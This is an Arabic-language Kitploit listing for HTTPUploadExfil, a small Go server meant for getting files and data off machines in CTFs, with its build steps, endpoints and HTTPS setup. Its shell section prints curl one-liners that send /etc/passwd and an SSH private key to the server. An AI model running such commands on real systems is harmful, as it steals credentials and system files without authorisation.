Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
HTTPUploadExfil — خادم HTTP بسيط لتوصيل واستخراج الملفات/البيانات خلال، على سبيل المثال، مسابقات CTF. | Kitploit
أدوات/GitHubGitHub/ingokl/httpuploadexfil
تسريب البياناتأمن الويبCTFاختبار الاختراق
GitHubingokl/httpuploadexfil

HTTPUploadExfil

خادم HTTP بسيط لتوصيل واستخراج الملفات/البيانات خلال، على سبيل المثال، مسابقات CTF.

عرض المستودع
8218منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

HTTPUploadExfil

شعار HTTPUploadExfil

MIT License GitHub stars

HTTPUploadExfil هو خادم HTTP بسيط (جدا) مكتوب بلغة Go، مفيد للحصول على ملفات (ومعلومات أخرى) من جهاز باستخدام HTTP. على الرغم من وجود العديد من حالات الاستخدام، إلا أنه مصمم للاستخدام في سيناريوهات هجومية منخفضة المخاطر (مثل CTFs).

فكر فيه على أنه python3 -m http.server لكن لنقل البيانات من جهاز بدلاً من نقلها إليه.

من الواضح أن هذه طريقة عالية الصوت ومحدودة نوعًا ما لتسريب البيانات. ومع ذلك، فهي عملية جدًا وأسهل إلى حد ما من استخدام SMB أو FTP مثلاً. إذا كنت تبحث عن شيء أكثر أناقة، فانظر مثلاً إلى dnsteal أو PyExfil.

خلاصة

  1. قم ببناء الأداة باستخدام go build.
  2. قم بتشغيل ./httpuploadexfil :1337 /home/kali/loot على جهازك.
  3. قم بالوصول إلى http://YOUR_IP:1337/ على الجهاز الذي تريد تسريب البيانات منه.
  4. ابحث عن ملفاتك المرفوعة في /home/kali/loot.

إذا كنت بحاجة إلى HTTPs، فانظر إلى المعلومات أدناه.

يمكنك أيضًا تنزيل الملفات الثنائية لأنظمة Linux و Windows من GitHub. ومع ذلك، فإن هذه الملفات الثنائية ليست بالضرورة ممثلة لأحدث التغييرات.

البناء والتطوير

على الرغم من توفر الملفات الثنائية، فمن المستحسن بناء الأداة بنفسك. بهذه الطريقة، ستحصل على أحدث إصدار، وستعرف بالضبط ما تقوم بتشغيله. العملية بسيطة:

ما عليك سوى تشغيل go build داخل المجلد، وستحصل على ملف تنفيذي httpuploadexfil لمنصتك.

إذا قمت بإجراء تغييرات على الأداة، فتذكر تنسيق الكود باستخدام go fmt main.go.

بدلاً من ذلك، يمكنك أيضًا استخدام make لبناء الأداة. يمكنك أيضًا تشغيل make cert لإنشاء شهادات SSL (انظر أدناه).

الاستخدام

حالة الاستخدام الأكثر شيوعًا هي تشغيل الخادم على الجهاز أ. الآن، على الجهاز ب، تقوم بالوصول إلى نموذج الرفع باستخدام متصفح وتحديد ملف لتسريبه. بالطبع، كما ترى أدناه، يمكن القيام بذلك أيضًا باستخدام curl مثلاً.

بالإضافة إلى رفع الملفات، يمكنك أيضًا استخدام HTTPUploadExfil لتسريب البيانات باستخدام طلبات GET بسيطة. إذا تم إرسال طلب إلى نقطة النهاية /g، فسيتم تخزين الطلب بالكامل على القرص.

وبالتالي، يمكنك تسريب البيانات باستخدام عنوان الطلب. من الأسهل استخدام معاملات GET (مثل ?data=...)، ولكن هناك خيارات أخرى.

HTTPUploadExfil

بشكل افتراضي، يتم تشغيل HTTPUploadExfil على المنفذ 8080. ستتم كتابة جميع الملفات في الدليل الحالي.

./httpuploadexfil

يمكنك أيضًا تقديم بعض الوسائط:

./httpuploadexfil :1337 /home/kali/loot

إذا كنت بحاجة إلى تسجيل الطلبات، فقم بتمرير العلم -log كما يلي:

./httpuploadexfil -log

الوسيطة الأولى هي عنوان الربط، والثانية هي المجلد لتخزين الملفات فيه.

ستقوم الأداة أيضًا بعرض الملفات الموجودة في دليل الغنائم تحت نقطة النهاية /l. يمكن استخدام هذا كوسيلة سهلة لجلب الملفات إلى الهدف.

نقاط النهاية

يعرض خادم الويب أربع نقاط نهاية لاستخدامك:

  1. / (GET) هو نموذج الرفع.
  2. /p (POST) يأخذ البيانات من نموذج الرفع. يتطلب طلب multipart/form-data مع حقل file مملوء.
  3. /g (GET) سيأخذ أي طلب GET ويخزن الطلب الكامل على الخادم.
  4. /l (GET) سيوفر الوصول إلى الملفات في المجلد المحدد (قائمة الدليل). هذا لتوفير وظائف python3 -m http.server الأساسية.

وضع HTTPs

يمكن استخدام HTTPUploadExfil أيضًا في وضع HTTPs. للقيام بذلك، ما عليك سوى وضع ملفي HTTPUploadExfil.csr و HTTPUploadExfil.key بجانب الملف الثنائي. يمكن إنشاء هذه الملفات، على سبيل المثال، على النحو التالي:

root@kitploit:~
openssl req -new -newkey rsa:2048 -nodes -keyout HTTPUploadExfil.key -out HTTPUploadExfil.csr
openssl x509 -req -days 365 -in HTTPUploadExfil.csr -signkey HTTPUploadExfil.key -out HTTPUploadExfil.csr

للقيام بذلك، يمكنك أيضًا تشغيل make cert.

إذا رأى الخادم ملف HTTPUploadExfil.csr، فسيحاول البدء في وضع HTTPs. للعودة إلى HTTP، ما عليك سوى إزالة أو إعادة تسمية ملفات الشهادة.

شل

باستخدام Bash، يمكننا تسريب البيانات عبر GET باستخدام، على سبيل المثال:

echo "data=`cat /etc/passwd`" | curl -d @- http://127.0.0.1:8080/g

بالطبع، يمكننا أيضًا استخدام curl لسحب الملفات:

curl -F file=@/home/kali/.ssh/id_rsa http://127.0.0.1:8080/p

قائمة المهام

  • تنفيذ إصدار HTTPs (تشفير النقل)
  • إضافة خيار التنزيل (أي توفير وظائف python3 -m http.server)
  • إضافة وظيفة تسجيل الطلبات
  • نظام البناء (خاصة التجميع المتقاطع لنظامي Windows و Linux)
تنزيل الأداة